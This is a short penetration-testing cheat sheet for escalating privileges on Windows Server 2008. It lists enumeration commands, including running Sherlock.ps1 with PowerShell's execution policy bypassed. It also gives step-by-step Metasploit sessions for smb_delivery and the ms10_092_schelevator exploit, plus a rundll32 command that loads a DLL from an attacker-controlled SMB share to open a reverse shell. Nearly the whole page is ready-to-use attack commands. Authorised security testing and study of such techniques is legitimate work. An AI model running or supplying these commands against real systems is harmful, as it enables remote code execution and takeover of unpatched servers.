windows-server
Windows Server 2008 Enumeration
wmic qfe
powershell.exe -ExecutionPolicy Bypass -File Sherlock.ps1
powershell.exe -ExecutionPolicy Bypass -Command "Import-Module .\Sherlock.ps1; Find-AllVulns"Metasploit (smb_delivery)
msf6 exploit(windows/smb/smb_delivery) > use exploit/windows/smb/smb_delivery
msf6 exploit(windows/smb/smb_delivery) > set SRVHOST <attacker_ip>
msf6 exploit(windows/smb/smb_delivery) > set LHOST <attacker_ip>
msf6 exploit(windows/smb/smb_delivery) > set LPORT 4444
msf6 exploit(windows/smb/smb_delivery) > set target 0
msf6 exploit(windows/smb/smb_delivery) > exploitTarget (Run from cmd.exe)
rundll32.exe \\<attacker_ip>\\lEUZam\\test.dll,0Metasploit (ms10_092_schelevator)
msf6 exploit(windows/local/ms10_092_schelevator) > use exploit/windows/local/ms10_092_schelevator
msf6 exploit(windows/local/ms10_092_schelevator) > set SESSION 1
msf6 exploit(windows/local/ms10_092_schelevator) > set LHOST <attacker_ip>
msf6 exploit(windows/local/ms10_092_schelevator) > set LPORT 4443
msf6 exploit(windows/local/ms10_092_schelevator) > exploitMeterpreter Commands
Last updated